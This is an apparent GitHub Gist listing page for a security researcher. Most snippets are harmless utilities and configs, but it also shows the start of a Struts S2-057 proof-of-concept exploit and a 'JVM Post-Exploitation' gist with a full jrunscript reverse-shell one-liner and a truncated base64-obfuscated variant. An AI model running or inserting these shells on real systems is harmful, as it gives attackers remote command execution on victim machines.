Chris Frohoff frohoff

  • San Diego, CA
@frohoff
frohoff / 14seg.py
Created Dec 17, 2018
14 segment display ascii renderer
#!/usr/bin/python
# $ echo bcefgG il | python 14seg.py
#
# | | |
# -- --
# | | |
import string
import sys
frohoff / s2-057.py
Created Aug 23, 2018
Struts S2-057 PoC exploit
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
import urllib2
if len(sys.argv) != 3:
    print 'Usage: %s [url] [command]' % sys.argv[0]
    exit(1)
frohoff / README.md
Last active Apr 30, 2018 — forked from TrueFurby/README.md
UserScript: Github Links to Star Badges
frohoff / docker-compose-commands.txt
Created Sep 8, 2017
docker-compose command usage/options
$ docker-compose 2>&1 | grep -E ' [a-z]+ ' | awk '{print $1}' | xargs -n1 -I{} docker-compose {} -h 2>&1 | grep -E '^\s*(Usage:|-+[a-z])'
Usage: build [options] [--build-arg key=val...] [SERVICE...]
--force-rm Always remove intermediate containers.
--no-cache Do not use cache when building the image.
--pull Always attempt to pull a newer version of the image.
--build-arg key=val Set build-time variables for one service.
Usage: bundle [options]
--push-images Automatically push images for any services
-o, --output PATH Path to write the bundle file to.
Usage: config [options]
frohoff / versions.yml
Last active Sep 8, 2017
travis-ci osx image jdk versions
# https://github.com/frohoff/travistest
# https://github.com/travis-ci/docs-travis-ci-com/issues/593
# https://docs.travis-ci.com/user/reference/osx/#OS-X-Version
osx_image: xcode9 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.3 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.2 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8.1 # oraclejdk8 1.8.0_112-b16
osx_image: xcode8 # oraclejdk8 1.8.0_92-b14
osx_image: xcode7.3 # oraclejdk8 1.8.0_74-b02
osx_image: xcode7.2 # oraclejdk8 1.8.0_66-b17
frohoff / Code.gs
Created Jun 17, 2017
google sheets directions/distance functions
function qs( obj ) {
  return '?'+Object.keys(obj).reduce(function(a,k){a.push(k+'='+encodeURIComponent(obj[k]));return a},[]).join('&')
}
function fetch_directions(o,d) {
  Logger.log("fetching: " + JSON.stringify([o,d]));
  var userProps = UserProperties.getProperties();
View ubuntu-docker-compose-up.sh
#!/bin/bash -xe
# export so the setting applies to every apt-get call, not only the first
export DEBIAN_FRONTEND=noninteractive
apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip
curl -s https://get.docker.com | sh
service docker start
pip install -U docker-compose
mkdir /opt/docker.d
View aws-docker-compose-up.sh
#!/bin/bash -xe
yum update -y
yum install -y git
curl -s https://get.docker.com | sh
service docker start
chkconfig docker on
pip install -U docker-compose
View COMMANDMENTS.md
  • Thou shalt place time/space/resource constraints on all otherwise open-ended operations
    • eg: timeouts, result counts, input sizes
  • Thou shalt strive to measure any quantitative values that can vary over time or across samples
    • eg: response times/counts, error counts,
  • Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
    • eg: timezones, metric/binary prefixes
frohoff / JVM_POST_EXPLOIT.md
Last active Mar 4, 2019
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V